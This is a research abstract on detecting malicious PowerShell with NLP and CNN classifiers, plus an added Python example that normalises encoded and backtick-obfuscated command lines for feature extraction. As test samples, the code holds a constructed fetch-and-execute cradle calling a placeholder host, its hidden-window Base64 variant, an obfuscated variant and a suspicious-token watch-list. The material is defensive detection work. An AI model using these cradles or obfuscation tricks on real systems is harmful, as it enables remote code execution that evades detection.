Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. While administrators can configure PowerShell to restrict access and reduce its attack surface, these restrictions can be bypassed. Moreover, PowerShell commands can easily be generated dynamically, executed from memory, encoded and obfuscated, which makes logging and forensic analysis of the code PowerShell executes challenging.

For all these reasons, PowerShell is increasingly used by cybercriminals as part of their attack tool chain, mainly for downloading malicious content and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to the abuse of PowerShell by cybercriminals reported a sharp increase both in the number of malicious PowerShell samples they received and in the number of penetration-testing tools and frameworks that use PowerShell. This highlights the urgent need for effective methods of detecting malicious PowerShell commands.

In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). The detectors' performance was evaluated on a large real-world dataset.

Our evaluation results show that, although each of our detectors individually yields high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier performs best, because the CNN-based classifier is able to detect malicious commands that evade the NLP-based one. Our analysis of these evasive commands reveals that some obfuscation patterns automatically learned by the CNN classifier are intrinsically difficult to detect with the NLP techniques we applied.
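The encoding and obfuscation the abstract describes is exactly what a detector has to undo before any feature extraction, whether it is keyword-, NLP- or character-level based. The following Python program is an added example for this page, not code from the paper: it decodes the Base64/UTF-16LE payload that powershell.exe accepts after -EncodedCommand, strips token-splitting backticks, and then shows what a keyword watch-list sees before and after that normalisation, alongside the character n-gram counts a character-level model would consume. The three sample command lines, the watch-list and the obfuscation signals are constructed assumptions chosen to illustrate the point; they are not the paper's dataset or feature set.

```python
"""Preprocessing PowerShell command lines before classifying them.

Added illustration, not code from the paper. Every sample command line below is
constructed for this example; the keyword watch-list and obfuscation signals
are assumptions chosen to make the point, not the paper's feature set.
"""
import base64
import re
from collections import Counter

# Constructed: a download cradle in the clear.
PLAIN_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"


def encode_command(script: str) -> str:
    """Build the argument powershell.exe expects after -EncodedCommand:
    base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed: the same cradle as it would appear in a process-creation log.
ENCODED_CMD = "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(PLAIN_CMD)

# Constructed: backticks split tokens, so substring matching on 'iex' or
# 'new-object' fails although PowerShell runs exactly the same cradle.
TICKED_CMD = "i`e`x (ne`w-obj`ect Net.WebClient).downloadstring('http://example.invalid/a.ps1')"

# -EncodedCommand and the shortened forms powershell.exe accepts for it.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A backtick between two word characters only splits a token; dropping it
# recovers the token. (Approximation: a real escape such as `n between word
# characters is dropped too, which is fine for features, not for execution.)
TICK_RE = re.compile(r"(?<=\w)`(?=\w)")

# Assumed watch-list for a keyword-style detector (illustrative, not the paper's).
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "new-object",
                     "downloadstring", "webclient", "-w hidden")


def decode_encoded_command(cmdline: str) -> str:
    """Replace an -EncodedCommand payload with the script it decodes to;
    blobs that are not valid base64/UTF-16LE are left untouched."""
    def _sub(match):
        try:
            return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
        except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
            return match.group(0)
    return ENC_RE.sub(_sub, cmdline)


def normalize(cmdline: str) -> str:
    """Decode, de-tick and lower-case so features see what will actually run."""
    return TICK_RE.sub("", decode_encoded_command(cmdline)).lower()


def keyword_hits(text: str) -> list:
    """Watch-list matches, in watch-list order."""
    lowered = text.lower()
    return [tok for tok in SUSPICIOUS_TOKENS if tok in lowered]


def char_ngrams(text: str, n: int = 3) -> Counter:
    """Character n-gram counts: the token-free representation a
    character-level model consumes, computed on lower-cased text."""
    text = text.lower()
    return Counter(text[i:i + n] for i in range(len(text) - n + 1))


def obfuscation_signals(cmdline: str) -> dict:
    """Cheap lexical signals measured on the raw command line."""
    return {
        "ticks_in_tokens": len(TICK_RE.findall(cmdline)),
        "string_concats": len(re.findall(r"""['"]\s*\+\s*['"]""", cmdline)),
        "char_casts": len(re.findall(r"\[char\]\s*\d+", cmdline, re.IGNORECASE)),
        "encoded_payload": ENC_RE.search(cmdline) is not None,
    }


def analyze(cmdline: str) -> dict:
    """Keyword hits before and after normalisation, plus the signals and
    n-gram features a classifier would be fed."""
    norm = normalize(cmdline)
    return {
        "raw_hits": keyword_hits(cmdline),
        "normalized_hits": keyword_hits(norm),
        "signals": obfuscation_signals(cmdline),
        "ngrams": char_ngrams(norm),
    }


if __name__ == "__main__":
    for cmd in (PLAIN_CMD, ENCODED_CMD, TICKED_CMD):
        result = analyze(cmd)
        print(cmd[:60], "...")
        print("  raw hits:       ", result["raw_hits"])
        print("  normalized hits:", result["normalized_hits"])
        print("  signals:        ", result["signals"])
```

On the encoded sample the watch-list only matches `-W Hidden`, because every other token is hidden inside the Base64 blob; on the backtick sample it misses `iex` and `new-object`. After normalisation both samples produce the same hits as the plain cradle, while the raw character n-grams still retain the obfuscation itself (`i`e`, `e`x`), which is the kind of surface pattern a character-level model can learn directly. Note that the decoder deliberately leaves blobs alone when they are not valid Base64 or UTF-16LE, so a malformed argument never causes the feature pipeline to fail on an otherwise loggable command line.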